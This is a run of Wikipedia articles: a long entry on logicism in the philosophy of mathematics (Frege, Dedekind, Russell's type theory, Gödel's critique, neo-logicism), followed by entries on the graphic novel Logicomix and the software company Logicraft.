Dedekind's argument begins with "1. In what follows I understand by thing every object of our thought"; we humans use symbols to discuss these "things" of our minds; "A thing is completely determined by all that can be affirmed or thought concerning it" (p. 44). In a subsequent paragraph Dedekind discusses what a "system S is: it is an aggregate, a manifold, a totality of associated elements (things) a , b , c "; he asserts that "such a system S . . . as an object of our thought is likewise a thing (1); it is completely determined when with respect to every thing it is determined whether it is an element of S or not.*" (p. 45, italics added). The * indicates a footnote where he states that:
Indeed he awaits Kronecker's "publishing his reasons for the necessity or merely the expediency of these limitations" (p. 45).
Kronecker, famous for his assertion that " God made the integers , all else is the work of man" [ 7 ] had his foes, among them Hilbert. Hilbert called Kronecker a " dogmatist , to the extent that he accepts the integer with its essential properties as a dogma and does not look back" [ 8 ] and equated his extreme constructivist stance with that of Brouwer's intuitionism , accusing both of "subjectivism": "It is part of the task of science to liberate us from arbitrariness, sentiment and habit and to protect us from the subjectivism that already made itself felt in Kronecker's views and, it seems to me, finds its culmination in intuitionism". [ 9 ] Hilbert then states that "mathematics is a presuppositionless science. To found it I do not need God, as does Kronecker . . ." (p. 479).
Russell's realism served him as an antidote to British idealism , [ 10 ] with portions borrowed from European rationalism and British empiricism . [ 11 ] To begin with, "Russell was a realist about two key issues: universals and material objects" (Russell 1912:xi). For Russell, tables are real things that exist independent of Russell the observer. Rationalism would contribute the notion of a priori knowledge, [ 12 ] while empiricism would contribute the role of experiential knowledge (induction from experience). [ 13 ] Russell would credit Kant with the idea of "a priori" knowledge, but he offers an objection to Kant he deems "fatal": "The facts [of the world] must always conform to logic and arithmetic. To say that logic and arithmetic are contributed by us does not account for this" (1912:87); Russell concludes that the a priori knowledge that we possess is "about things, and not merely about thoughts" (1912:89). And in this Russell's epistemology seems different from that of Dedekind's belief that "numbers are free creations of the human mind" (Dedekind 1887:31) [ 14 ]
But his epistemology about the innate (he prefers the word a priori when applied to logical principles, cf. 1912:74) is intricate. He would strongly, unambiguously express support for the Platonic "universals" (cf. 1912:91-118) and he would conclude that truth and falsity are "out there"; minds create beliefs and what makes a belief true is a fact, "and this fact does not (except in exceptional cases) involve the mind of the person who has the belief" (1912:130).
Where did Russell derive these epistemic notions? He tells us in the Preface to his 1903 Principles of Mathematics . Note that he asserts that the belief: "Emily is a rabbit" is non-existent, and yet the truth of this non-existent proposition is independent of any knowing mind; if Emily really is a rabbit, the fact of this truth exists whether or not Russell or any other mind is alive or dead, and the relation of Emily to rabbit-hood is "ultimate":
In 1902 Russell discovered a "vicious circle" ( Russell's paradox ) in Frege's Grundgesetze der Arithmetik , derived from Frege's Basic Law V and he was determined not to repeat it in his 1903 Principles of Mathematics . In two Appendices added at the last minute he devoted 28 pages to both a detailed analysis of Frege's theory contrasted against his own, and a fix for the paradox. But he was not optimistic about the outcome:
Gödel in his 1944 would disagree with the young Russell of 1903 ("[my premisses] allow mathematics to be true") but would probably agree with Russell's statement quoted above ("something is amiss"); Russell's theory had failed to arrive at a satisfactory foundation of mathematics: the result was "essentially negative; i.e. the classes and concepts introduced this way do not have all the properties required for the use of mathematics" (Gödel 1944:132).
How did Russell arrive in this situation? Gödel observes that Russell is a surprising "realist" with a twist: he cites Russell's 1919:169 "Logic is concerned with the real world just as truly as zoology" (Gödel 1944:120). But he observes that "when he started on a concrete problem, the objects to be analyzed (e.g. the classes or propositions) soon for the most part turned into "logical fictions" . . . [meaning] only that we have no direct perception of them." (Gödel 1944:120)
In an observation pertinent to Russell's brand of logicism, Perry remarks that Russell went through three phases of realism: extreme, moderate and constructive (Perry 1997:xxv). In 1903 he was in his extreme phase; by 1905 he would be in his moderate phase. In a few years he would "dispense with physical or material objects as basic bits of the furniture of the world. He would attempt to construct them out of sense-data" in his next book Our knowledge of the External World [1914]" (Perry 1997:xxvi).
These constructions in what Gödel 1944 would call " nominalistic constructivism ... which might better be called fictionalism " derived from Russell's "more radical idea, the no-class theory" (p. 125):
See more in the Criticism sections, below.
The logicism of Frege and Dedekind is similar to that of Russell, but with differences in the particulars (see Criticisms, below). Overall, the logicist derivations of the natural numbers are different from derivations from, for example, Zermelo's axioms for set theory ('Z'). Whereas, in derivations from Z, one definition of "number" uses an axiom of that system – the axiom of pairing – that leads to the definition of " ordered pair " – no overt number axiom exists in the various logicist axiom systems allowing the derivation of the natural numbers. Note that the axioms needed to derive the definition of a number may differ between axiom systems for set theory in any case. For instance, in ZF and ZFC, the axiom of pairing, and hence ultimately the notion of an ordered pair is derivable from the Axiom of Infinity and the Axiom of Replacement and is required in the definition of the von Neumann numerals (but not the Zermelo numerals), whereas in NFU the Frege numerals may be derived in an analogous way to their derivation in the Grundgesetze.
The Principia , like its forerunner the Grundgesetze , begins its construction of the numbers from primitive propositions such as "class", "propositional function", and in particular, relations of "similarity" (" equinumerosity ": placing the elements of collections in one-to-one correspondence) and "ordering" (using "the successor of" relation to order the collections of the equinumerous classes)". [ 15 ] The logicistic derivation equates the cardinal numbers constructed this way to the natural numbers, and these numbers end up all of the same "type" – as classes of classes – whereas in some set theoretical constructions – for instance the von Neumann and the Zermelo numerals – each number has its predecessor as a subset . Kleene observes the following. (Kleene's assumptions (1) and (2) state that 0 has property P and n +1 has property P whenever n has property P .)
The importance to the logicist programme of the construction of the natural numbers derives from Russell's contention "That all traditional pure mathematics can be derived from the natural numbers is a fairly recent discovery, though it had long been suspected" (1919:4). One derivation of the real numbers derives from the theory of Dedekind cuts on the rational numbers, rational numbers in turn being derived from the naturals. While an example of how this is done is useful, it relies first on the derivation of the natural numbers. So, if philosophical difficulties appear in a logicist derivation of the natural numbers, these problems should be sufficient to stop the program until these are resolved (see Criticisms, below).
One attempt to construct the natural numbers is summarized by Bernays 1930–1931. [ 16 ] But rather than use Bernays' précis, which is incomplete in some details, an attempt at a paraphrase of Russell's construction, incorporating some finite illustrations, is set out below:
For Russell, collections (classes) are aggregates of "things" specified by proper names, that come about as the result of propositions (assertions of fact about a thing or things). Russell analysed this general notion. He begins with "terms" in sentences, which he analysed as follows:
For Russell, "terms" are either "things" or "concepts": "Whatever may be an object of thought, or may occur in any true or false proposition, or can be counted as one, I call a term . This, then, is the widest word in the philosophical vocabulary. I shall use as synonymous with it the words, unit, individual, and entity. The first two emphasize the fact that every term is one, while the third is derived from the fact that every term has being, i.e. is in some sense. A man, a moment, a number, a class, a relation, a chimaera, or anything else that can be mentioned, is sure to be a term; and to deny that such and such a thing is a term must always be false" (Russell 1903:43)
"Among terms, it is possible to distinguish two kinds, which I shall call respectively things and concepts ; the former are the terms indicated by proper names, the latter those indicated by all other words . . . Among concepts, again, two kinds at least must be distinguished, namely those indicated by adjectives and those indicated by verbs" (1903:44).
"The former kind will often be called predicates or class-concepts; the latter are always or almost always relations." (1903:44)
"I shall speak of the terms of a proposition as those terms, however numerous, which occur in a proposition and may be regarded as subjects about which the proposition is. It is a characteristic of the terms of a proposition that anyone of them may be replaced by any other entity without our ceasing to have a proposition. Thus we shall say that "Socrates is human" is a proposition having only one term; of the remaining component of the proposition, one is the verb, the other is a predicate.. . . Predicates, then, are concepts, other than verbs, which occur in propositions having only one term or subject." (1903:45)
Suppose one were to point to an object and say: "This object in front of me named 'Emily' is a woman." This is a proposition, an assertion of the speaker's belief, which is to be tested against the "facts" of the outer world: "Minds do not create truth or falsehood. They create beliefs . . . what makes a belief true is a fact , and this fact does not (except in exceptional cases) in any way involve the mind of the person who has the belief" (1912:130). If by investigation of the utterance and correspondence with "fact", Russell discovers that Emily is a rabbit, then his utterance is considered "false"; if Emily is a female human (a female "featherless biped" as Russell likes to call humans, following Diogenes Laërtius 's anecdote about Plato ), then his utterance is considered "true".
"The class, as opposed to the class-concept, is the sum or conjunction of all the terms which have the given predicate" (1903 p. 55). Classes can be specified by extension (listing their members) or by intension, i.e. by a "propositional function" such as " x is a u " or " x is v ". But "if we take extension pure, our class is defined by enumeration of its terms, and this method will not allow us to deal, as Symbolic Logic does, with infinite classes. Thus our classes must in general be regarded as objects denoted by concepts, and to this extent the point of view of intension is essential." (1909 p. 66)
"The characteristic of a class concept, as distinguished from terms in general, is that " x is a u " is a propositional function when, and only when, u is a class-concept." (1903:56)
"71. Class may be defined either extensionally or intensionally. That is to say, we may define the kind of object which is a class, or the kind of concept which denotes a class: this is the precise meaning of the opposition of extension and intension in this connection. But although the general notion can be defined in this two-fold manner, particular classes, except when they happen to be finite, can only be defined intensionally, i.e. as the objects denoted by such and such concepts. . . logically; the extensional definition appears to be equally applicable to infinite classes, but practically, if we were to attempt it, Death would cut short our laudable endeavour before it had attained its goal."(1903:69)
In the Prinicipia, the natural numbers derive from all propositions that can be asserted about any collection of entities. Russell makes this clear in the second (italicized) sentence below.
To illustrate, consider the following finite example: Suppose there are 12 families on a street. Some have children, some do not. To discuss the names of the children in these households requires 12 propositions asserting " childname is the name of a child in family F n " applied to this collection of households on the particular street of families with names F1, F2, . . . F12. Each of the 12 propositions regards whether or not the "argument" childname applies to a child in a particular household. The children's names ( childname ) can be thought of as the x in a propositional function f ( x ), where the function is "name of a child in the family with name F n ". [ 17 ] [ original research? ]
Whereas the preceding example is finite over the finite propositional function " childnames of the children in family F n' " on the finite street of a finite number of families, Russell apparently intended the following to extend to all propositional functions extending over an infinite domain so as to allow the creation of all the numbers.
Kleene considers that Russell has set out an impredicative definition that he will have to resolve, or risk deriving something like the Russell paradox . "Here instead we presuppose the totality of all properties of cardinal numbers, as existing in logic, prior to the definition of the natural number sequence" (Kleene 1952:44). The problem will appear, even in the finite example presented here, when Russell deals with the unit class (cf. Russell 1903:517).
The question arises what precisely a "class" is or should be. For Dedekind and Frege, a class is a distinct entity in its own right, a 'unity' that can be identified with all those entities x that satisfy some propositional function F . (This symbolism appears in Russell, attributed there to Frege: "The essence of a function is what is left when the x is taken away, i.e in the above instance, 2( ) 3 + ( ). The argument x does not belong to the function, but the two together make a whole (ib. p. 6 [i.e. Frege's 1891 Function und Begriff ]" (Russell 1903:505).) For example, a particular "unity" could be given a name; suppose a family Fα has the children with the names Annie, Barbie and Charles:
This notion of collection or class as object, when used without restriction, results in Russell's paradox ; see more below about impredicative definitions . Russell's solution was to define the notion of a class to be only those elements that satisfy the proposition, his argument being that, indeed, the arguments x do not belong to the propositional function aka "class" created by the function. The class itself is not to be regarded as a unitary object in its own right, it exists only as a kind of useful fiction: "We have avoided the decision as to whether a class of things has in any sense an existence as one object. A decision of this question in either way is indifferent to our logic" (First edition of Principia Mathematica 1927:24).
Russell continues to hold this opinion in his 1919; observe the words "symbolic fictions": [ original research? ]
And in the second edition of PM (1927) Russell holds that "functions occur only through their values, . . . all functions of functions are extensional, . . . [and] consequently there is no reason to distinguish between functions and classes . . . Thus classes, as distinct from functions, lose even that shadowy being which they retain in *20" (p. xxxix). In other words, classes as a separate notion have vanished altogether.
Step 2: Collect "similar" classes into 'bundles' : These above collections can be put into a "binary relation" (comparing for) similarity by "equinumerosity", symbolized here by ≈ , i.e. one-one correspondence of the elements, [ 18 ] and thereby create Russellian classes of classes or what Russell called "bundles". "We can suppose all couples in one bundle, all trios in another, and so on. In this way we obtain various bundles of collections, each bundle consisting of all the collections that have a certain number of terms. Each bundle is a class whose members are collections, i.e. classes; thus each is a class of classes" (Russell 1919:14).
Step 3: Define the null class : Notice that a certain class of classes is special because its classes contain no elements, i.e. no elements satisfy the predicates whose assertion defined this particular class/collection.
The resulting entity may be called "the null class" or "the empty class". Russell symbolized the null/empty class with Λ. So what exactly is the Russellian null class? In PM Russell says that "A class is said to exist when it has at least one member . . . the class which has no members is called the "null class" . . . "α is the null-class" is equivalent to "α does not exist". The question naturally arises whether the null class itself 'exists'? Difficulties related to this question occur in Russell's 1903 work. [ 19 ] After he discovered the paradox in Frege's Grundgesetze he added Appendix A to his 1903 where through the analysis of the nature of the null and unit classes, he discovered the need for a "doctrine of types"; see more about the unit class, the problem of impredicative definitions and Russell's "vicious circle principle" below. [ 19 ]
Step 4: Assign a "numeral" to each bundle : For purposes of abbreviation and identification, to each bundle assign a unique symbol (aka a "numeral"). These symbols are arbitrary.
Step 5: Define "0" Following Frege, Russell picked the empty or null class of classes as the appropriate class to fill this role, this being the class of classes having no members. This null class of classes may be labelled "0"
Step 6: Define the notion of "successor" : Russell defined a new characteristic "hereditary" (cf Frege's 'ancestral'), a property of certain classes with the ability to "inherit" a characteristic from another class (which may be a class of classes) i.e. "A property is said to be "hereditary" in the natural-number series if, whenever it belongs to a number n , it also belongs to n +1, the successor of n ". (1903:21). He asserts that "the natural numbers are the posterity – the "children", the inheritors of the "successor" – of 0 with respect to the relation "the immediate predecessor of (which is the converse of "successor") (1919:23).
Note Russell has used a few words here without definition, in particular "number series", "number n ", and "successor". He will define these in due course. Observe in particular that Russell does not use the unit class of classes "1" to construct the successor . The reason is that, in Russell's detailed analysis, [ 20 ] if a unit class becomes an entity in its own right, then it too can be an element in its own proposition; this causes the proposition to become "impredicative" and result in a "vicious circle". Rather, he states: "We saw in Chapter II that a cardinal number is to be defined as a class of classes, and in Chapter III that the number 1 is to be defined as the class of all unit classes, of all that have just one member, as we should say but for the vicious circle. Of course, when the number 1 is defined as the class of all unit classes, unit classes must be defined so as not to assume that we know what is meant by one (1919:181).
For his definition of successor, Russell will use for his "unit" a single entity or "term" as follows:
Russell's definition requires a new "term" which is "added into" the collections inside the bundles.
Step 7: Construct the successor of the null class .
Step 8: For every class of equinumerous classes, create its successor .
Step 9: Order the numbers : The process of creating a successor requires the relation " . . . is the successor of . . .", which may be denoted " S ", between the various "numerals". "We must now consider the serial character of the natural numbers in the order 0, 1, 2, 3, . . . We ordinarily think of the numbers as in this order, and it is an essential part of the work of analysing our data to seek a definition of "order" or "series " in logical terms. . . . The order lies, not in the class of terms, but in a relation among the members of the class, in respect of which some appear as earlier and some as later." (1919:31)
Russell applies to the notion of "ordering relation" three criteria: First, he defines the notion of asymmetry i.e. given the relation such as S (" . . . is the successor of . . . ") between two terms x and y : x S y ≠ y S x . Second, he defines the notion of transitivity for three numerals x , y and z : if x S y and y S z then x S z . Third, he defines the notion of connected : "Given any two terms of the class which is to be ordered, there must be one which precedes and the other which follows. . . . A relation is connected when, given any two different terms of its field [both domain and converse domain of a relation e.g. husbands versus wives in the relation of married] the relation holds between the first and the second or between the second and the first (not excluding the possibility that both may happen, though both cannot happen if the relation is asymmetrical).(1919:32)
He concludes: ". . . [natural] number m is said to be less than another number n when n possesses every hereditary property possessed by the successor of m . It is easy to see, and not difficult to prove, that the relation "less than", so defined, is asymmetrical, transitive, and connected, and has the [natural] numbers for its field [i.e. both domain and converse domain are the numbers]." (1919:35)
The presumption of an 'extralogical' notion of iteration : Kleene notes that "the logicistic thesis can be questioned finally on the ground that logic already presupposes mathematical ideas in its formulation. In the Intuitionistic view, an essential mathematical kernel is contained in the idea of iteration" (Kleene 1952:46)
Bernays 1930–1931 observes that this notion "two things" already presupposes something, even without the claim of existence of two things, and also without reference to a predicate, which applies to the two things; it means, simply, "a thing and one more thing. . . . With respect to this simple definition, the Number concept turns out to be an elementary structural concept . . . the claim of the logicists that mathematics is purely logical knowledge turns out to be blurred and misleading upon closer observation of theoretical logic. . . . [one can extend the definition of "logical"] however, through this definition what is epistemologically essential is concealed, and what is peculiar to mathematics is overlooked" (in Mancosu 1998:243).
Hilbert 1931:266-7, like Bernays, considers there is "something extra-logical" in mathematics: "Besides experience and thought, there is yet a third source of knowledge. Even if today we can no longer agree with Kant in the details, nevertheless the most general and fundamental idea of the Kantian epistemology retains its significance: to ascertain the intuitive a priori mode of thought, and thereby to investigate the condition of the possibility of all knowledge. In my opinion this is essentially what happens in my investigations of the principles of mathematics. The a priori is here nothing more and nothing less than a fundamental mode of thought, which I also call the finite mode of thought: something is already given to us in advance in our faculty of representation: certain extra-logical concrete objects that exist intuitively as an immediate experience before all thought. If logical inference is to be certain, then these objects must be completely surveyable in all their parts, and their presentation, their differences, their succeeding one another or their being arrayed next to one another is immediately and intuitively given to us, along with the objects, as something that neither can be reduced to anything else, nor needs such a reduction." (Hilbert 1931 in Mancosu 1998: 266, 267).
In brief, according to Hilbert and Bernays, the notion of "sequence" or "successor" is an a priori notion that lies outside symbolic logic.
Hilbert dismissed logicism as a "false path": "Some tried to define the numbers purely logically; others simply took the usual number-theoretic modes of inference to be self-evident. On both paths they encountered obstacles that proved to be insuperable." (Hilbert 1931 in Mancoso 1998:267). The incompleteness theorems arguably constitute a similar obstacle for Hilbertian finitism.
Mancosu states that Brouwer concluded that: "the classical laws or principles of logic are part of [the] perceived regularity [in the symbolic representation]; they are derived from the post factum record of mathematical constructions . . . Theoretical logic . . . [is] an empirical science and an application of mathematics" (Brouwer quoted by Mancosu 1998:9).
With respect to the technical aspects of Russellian logicism as it appears in Principia Mathematica (either edition), Gödel in 1944 was disappointed:
In particular he pointed out that "The matter is especially doubtful for the rule of substitution and of replacing defined symbols by their definiens " (Russell 1944:120)
With respect to the philosophy that might underlie these foundations, Gödel considered Russell's "no-class theory" as embodying a "nominalistic kind of constructivism . . . which might better be called fictionalism" (cf. footnote 1 in Gödel 1944:119) – to be faulty. See more in "Gödel's criticism and suggestions" below.
A complicated theory of relations continued to strangle Russell's explanatory 1919 Introduction to Mathematical Philosophy and his 1927 second edition of Principia . Set theory, meanwhile had moved on with its reduction of relation to the ordered pair of sets. Grattan-Guinness observes that in the second edition of Principia Russell ignored this reduction that had been achieved by his own student Norbert Wiener (1914). Perhaps because of "residual annoyance, Russell did not react at all". [ 21 ] By 1914 Hausdorff would provide another, equivalent definition, and Kuratowski in 1921 would provide the one in use today . [ 22 ]
Suppose a librarian wants to index her collection into a single book (call it Ι for "index"). Her index will list all the books and their locations in the library. As it turns out, there are only three books, and these have titles Ά, β, and Γ. To form her index I, she goes out and buys a book of 200 blank pages and labels it "I". Now she has four books: I, Ά, β, and Γ. Her task is not difficult. When completed, the contents of her index I are 4 pages, each with a unique title and unique location (each entry abbreviated as Title.Location T ):
This sort of definition of I was deemed by Poincaré to be " impredicative ". He seems to have considered that only predicative definitions can be allowed in mathematics:
By Poincaré's definition, the librarian's index book is "impredicative" because the definition of I is dependent upon the definition of the totality I, Ά, β, and Γ. As noted below, some commentators insist that impredicativity in commonsense versions is harmless, but as the examples show below there are versions which are not harmless. In response to these difficulties, Russell advocated a strong prohibition, his "vicious circle principle":
To illustrate what a pernicious instance of impredicativity might be, consider the consequence of inputting argument α into the function f with output ω = 1−α. This may be seen as the equivalent 'algebraic-logic' expression to the 'symbolic-logic' expression ω = NOT -α, with truth values 1 and 0. When input α = 0, output ω = 1; when input α = 1, output ω = 0.
To make the function "impredicative", identify the input with the output, yielding α = 1−α
Within the algebra of, say, rational numbers the equation is satisfied when α = 0.5. But within, for instance, a Boolean algebra, where only "truth values" 0 and 1 are permitted, then the equality cannot be satisfied.
Some of the difficulties in the logicist programme may derive from the α = NOT-α paradox [ 25 ] Russell discovered in Frege's 1879 Begriffsschrift [ 26 ] that Frege had allowed a function to derive its input "functional" (value of its variable) not only from an object (thing, term), but also from the function's own output. [ 27 ]
As described above, Both Frege's and Russell's constructions of the natural numbers begin with the formation of equinumerous classes of classes ("bundles"), followed by an assignment of a unique "numeral" to each bundle, and then by the placing of the bundles into an order via a relation S that is asymmetric: x S y ≠ y S x . But Frege, unlike Russell, allowed the class of unit classes to be identified as a unit itself:
But, since the class with numeral 1 is a single object or unit in its own right, it too must be included in the class of unit classes. This inclusion results in an infinite regress of increasing type and increasing content.
Russell avoided this problem by declaring a class to be more or a "fiction". By this he meant that a class could designate only those elements that satisfied its propositional function and nothing else. As a "fiction" a class cannot be considered to be a thing: an entity, a "term", a singularity, a "unit". It is an assemblage but is not in Russell's view "worthy of thing-hood":
This supposes that "at the bottom" every single solitary "term" can be listed (specified by a "predicative" predicate) for any class, for any class of classes, for class of classes of classes, etc, but it introduces a new problem—a hierarchy of "types" of classes.
Gödel 1944:131 observes that "Russell adduces two reasons against the extensional view of classes, namely the existence of (1) the null class, which cannot very well be a collection, and (2) the unit classes, which would have to be identical with their single elements." He suggests that Russell should have regarded these as fictitious, but not derive the further conclusion that all classes (such as the class-of-classes that define the numbers 2, 3, etc) are fictions.
But Russell did not do this. After a detailed analysis in Appendix A: The Logical and Arithmetical Doctrines of Frege in his 1903, Russell concludes:
In the following notice the wording "the class as many"—a class is an aggregate of those terms (things) that satisfy the propositional function, but a class is not a thing-in-itself :
It is as if a rancher were to round up all his livestock (sheep, cows and horses) into three fictitious corrals (one for the sheep, one for the cows, and one for the horses) that are located in his fictitious ranch. What actually exist are the sheep, the cows and the horses (the extensions), but not the fictitious "concepts" corrals and ranch. [ original research? ]
When Russell proclaimed all classes are useful fictions he solved the problem of the "unit" class, but the overall problem did not go away; rather, it arrived in a new form: "It will now be necessary to distinguish (1) terms, (2) classes, (3) classes of classes, and so on ad infinitum ; we shall have to hold that no member of one set is a member of any other set, and that x ε u requires that x should be of a set of a degree lower by one than the set to which u belongs. Thus x ε x will become a meaningless proposition; and in this way the contradiction is avoided" (1903:517).
This is Russell's "doctrine of types". To guarantee that impredicative expressions such as x ε x can be treated in his logic, Russell proposed, as a kind of working hypothesis, that all such impredicative definitions have predicative definitions. This supposition requires the notions of function-"orders" and argument-"types". First, functions (and their classes-as-extensions, i.e. "matrices") are to be classified by their "order", where functions of individuals are of order 1, functions of functions (classes of classes) are of order 2, and so forth. Next, he defines the "type" of a function's arguments (the function's "inputs") to be their "range of significance", i.e. what are those inputs α (individuals? classes? classes-of-classes? etc.) that, when plugged into f ( x ), yield a meaningful output ω. Note that this means that a "type" can be of mixed order, as the following example shows:
This sentence can be decomposed into two clauses: " x won the 1947 World Series" + " y won the 1947 World Series". The first sentence takes for x an individual "Joe DiMaggio" as its input, the other takes for y an aggregate "Yankees" as its input. Thus the composite-sentence has a (mixed) type of 2, mixed as to order (1 and 2).
By "predicative", Russell meant that the function must be of an order higher than the "type" of its variable(s). Thus a function (of order 2) that creates a class of classes can only entertain arguments for its variable(s) that are classes (type 1) and individuals (type 0), as these are lower types. Type 3 can only entertain types 2, 1 or 0, and so forth. But these types can be mixed (for example, for this sentence to be (sort of) true: " z won the 1947 World Series" could accept the individual (type 0) "Joe DiMaggio" and/or the names of his other teammates, and it could accept the class (type 1) of individual players "The Yankees".
The axiom of reducibility is the hypothesis that any function of any order can be reduced to (or replaced by) an equivalent predicative function of the appropriate order. [ 28 ] A careful reading of the first edition indicates that an n th order predicative function need not be expressed "all the way down" as a huge "matrix" or aggregate of individual atomic propositions. "For in practice only the relative types of variables are relevant; thus the lowest type occurring in a given context may be called that of individuals" (p. 161). But the axiom of reducibility proposes that in theory a reduction "all the way down" is possible.
By the 2nd edition of PM of 1927, though, Russell had given up on the axiom of reducibility and concluded he would indeed force any order of function "all the way down" to its elementary propositions, linked together with logical operators:
(The "stroke" is Sheffer's stroke – adopted for the 2nd edition of PM – a single two argument logical function from which all other logical functions may be defined.)
The net result, though, was a collapse of his theory. Russell arrived at this disheartening conclusion: that "the theory of ordinals and cardinals survives . . . but irrationals , and real numbers generally, can no longer be adequately dealt with. . . . Perhaps some further axiom, less objectionable than the axiom of reducibility, might give these results, but we have not succeeded in finding such an axiom" ( PM 1927:xiv).
Gödel 1944 agrees that Russell's logicist project was stymied; he seems to disagree that even the integers survived:
Gödel asserts, however, that this procedure seems to presuppose arithmetic in some form or other (p. 134). He deduces that "one obtains integers of different orders" (p. 134-135); the proof in Russell 1927 PM Appendix B that "the integers of any order higher than 5 are the same as those of order 5" is "not conclusive" and "the question whether (or to what extent) the theory of integers can be obtained on the basis of the ramified hierarchy [classes plus types] must be considered as unsolved at the present time". Gödel concluded that it wouldn't matter anyway because propositional functions of order n (any n ) must be described by finite combinations of symbols (all quotes and content derived from page 135).
Gödel, in his 1944 work, identifies the place where he considers Russell's logicism to fail and offers suggestions to rectify the problems. He submits the "vicious circle principle" to re-examination, splitting it into three parts "definable only in terms of", "involving" and "presupposing". It is the first part that "makes impredicative definitions impossible and thereby destroys the derivation of mathematics from logic, effected by Dedekind and Frege, and a good deal of mathematics itself". Since, he argues, mathematics sees to rely on its inherent impredicativities (e.g. "real numbers defined by reference to all real numbers"), he concludes that what he has offered is "a proof that the vicious circle principle is false [rather] than that classical mathematics is false" (all quotes Gödel 1944:127).
Russell's no-class theory is the root of the problem : Gödel believes that impredicativity is not "absurd", as it appears throughout mathematics. Russell's problem derives from his "constructivistic (or nominalistic" [ 29 ] ) standpoint toward the objects of logic and mathematics, in particular toward propositions, classes, and notions . . . a notion being a symbol . . . so that a separate object denoted by the symbol appears as a mere fiction" (p. 128).
Indeed, Russell's "no class" theory, Gödel concludes:
He concludes his essay with the following suggestions and observations:
Neo-logicism describes a range of views considered by their proponents to be successors of the original logicist program. [ 30 ] More narrowly, neo-logicism may be seen as the attempt to salvage some or all elements of Frege's programme through the use of a modified version of Frege's system in the Grundgesetze (which may be seen as a kind of second-order logic ).
For instance, one might replace Basic Law V (analogous to the axiom schema of unrestricted comprehension in naive set theory ) with some 'safer' axiom so as to prevent the derivation of the known paradoxes. The most cited candidate to replace BLV is Hume's principle , the contextual definition of '#' given by '# F = # G if and only if there is a bijection between F and G' . [ 31 ] This kind of neo-logicism is often referred to as neo-Fregeanism . [ 32 ] Proponents of neo-Fregeanism include Crispin Wright and Bob Hale , sometimes also called the Scottish School or abstractionist Platonism , [ 33 ] who espouse a form of epistemic foundationalism . [ 34 ]
Other major proponents of neo-logicism include Bernard Linsky and Edward N. Zalta , sometimes called the Stanford–Edmonton School , abstract structuralism or modal neo-logicism , who espouse a form of axiomatic metaphysics . [ 34 ] [ 32 ] Modal neo-logicism derives the Peano axioms within second-order modal object theory . [ 35 ] [ 36 ]
Another quasi-neo-logicist approach has been suggested by M. Randall Holmes. In this kind of amendment to the Grundgesetze , BLV remains intact, save for a restriction to stratifiable formulae in the manner of Quine's NF and related systems. Essentially all of the Grundgesetze then 'goes through'. The resulting system has the same consistency strength as Jensen 's NFU + Rosser 's Axiom of Counting. [ 37 ] | https://en.wikipedia.org/wiki/Logicism |
Logicomix: An Epic Search for Truth is a graphic novel about the foundational quest in mathematics , written by Apostolos Doxiadis , author of Uncle Petros and Goldbach's Conjecture , and theoretical computer scientist Christos Papadimitriou . Character design and artwork are by Alecos Papadatos and color is by Annie Di Donna. The book was originally written in English, and was translated into Greek by author Apostolos Doxiadis for the release in Greece, which preceded the UK and U.S. releases.
Set between the late 19th century and the present day, the graphic novel Logicomix is based on the story of the so-called "foundational quest" in mathematics.
Logicomix intertwines the philosophical struggles with the characters' own personal turmoil. These are in turn played out just upstage of the momentous historical events of the era and the ideological battles which gave rise to them. The narrator of the story is Bertrand Russell , who stands as an icon of many of these themes: a deeply sensitive and introspective man, Russell was not just a philosopher and pacifist, he was also one of the prominent figures in the foundational quest. Russell's life story, depicted by Logicomix , is itself a journey through the goals and struggles, and triumph and tragedy shared by many great thinkers of the 20th century: Georg Cantor , Ludwig Wittgenstein , G. E. Moore , Alfred North Whitehead , David Hilbert , Gottlob Frege , Henri Poincaré , Kurt Gödel , and Alan Turing .
A parallel tale, set in present-day Athens , records the creators’ disagreement on the meaning of the story, thus setting in relief the foundational quest as a quintessentially modern adventure. It is on the one hand a tragedy of the hubris of rationalism , which descends inextricably on madness, and on the other an origin myth of the computer.
In chronological order:
Culture Critic assessed British and American critical response as an aggregated score of 86%. [ 1 ] On The Omnivore , an aggregator of British press, the book received an "omniscore" of four out of five. [ 2 ]
Jim Holt reviewed the book for the New York Times and says the story "is presented with real graphic verve. (Even though I’m a text guy, I couldn’t keep my eyes off the witty drawings.)" although he does note "one serious misstep" involving the overplaying of the impact Russell's paradox had on mathematics. [ 3 ] A review at The Guardian said that the "authors tell the story with a humour and lightness of touch that pokes fun at the philosophers and mathematicians involved, but never trivialises the philosophy or the mathematics", concluding that "Doxiadis has shown that by using fiction to provide an emotional context to mathematical discoveries it can make for a gripping read. Uncle Petros was a bestseller and the much more ambitious Logicomix deserves to be one too." [ 4 ]
The book was recommended by the New Statesman in late September. [ 5 ] On October 2 the book made the New York Times, Sunday Book Review, Editor's Choice list [ 6 ] and the next week it was #1 on the NYT Graphic Novel Best Seller list. [ 7 ] The book sold out on the day it was released in the United States and United Kingdom, and also got into the Top 10 on Amazon.com and Amazon.co.uk , leading the manager of a major Athens bookstore to say "No Greek book has sold abroad like this in 30 years." [ 8 ]
At the beginning of the book (page 16) there is talk of "the non-aggression pact between Nazi Germany and the United Kingdom ", signed in Munich , which led to the invasion of Poland , with a drawing showing an infuriated Polish soldier accusing a Briton of being the culprit of such a crime. In fact, the Munich Agreement was concluded in 1938 and the "non-aggression pact" from the era was between Nazi Germany and the Soviet Union (namely the Molotov–Ribbentrop Pact ), which led to the invasion of Poland, with the UK then declaring war on Germany.
According to Paolo Mancosu in The Bulletin of Symbolic Logic , the authors "admittedly take liberties with the real course of events", for example with reference to the alleged meetings Russell would have had with Frege and Cantor. Although "such departures from reality can be fruitful for narrative purposes", according to Mancosu, in some cases they are objectionable, as the portrayal of Frege as a "rabid paranoid antisemite", and the "constant refrain of the alleged causal link between logic and madness". From "the conceptual point of view, some of the major ideas about the foundation of mathematics are conveyed with reasonable accuracy", although sometimes errors, mistakes, and inaccuracies occur. [ 9 ]
However, the global judgement by Mancosu is positive:
I enjoyed reading Logicomix immensely. The authors have tackled an extremely complicated subject with thought-provoking ideas in an aesthetically pleasing and entertaining fashion. Thus, my few critical remarks should not mislead you. I highly recommend Logicomix even though my recommendation is qualified: the reader should provide his/her grain of salt. [ 10 ] | https://en.wikipedia.org/wiki/Logicomix |
Logicraft was an American software company. The company's products enabled Digital Equipment Corporation (DEC) minicomputers to run PC software (such as Lotus-123 ).
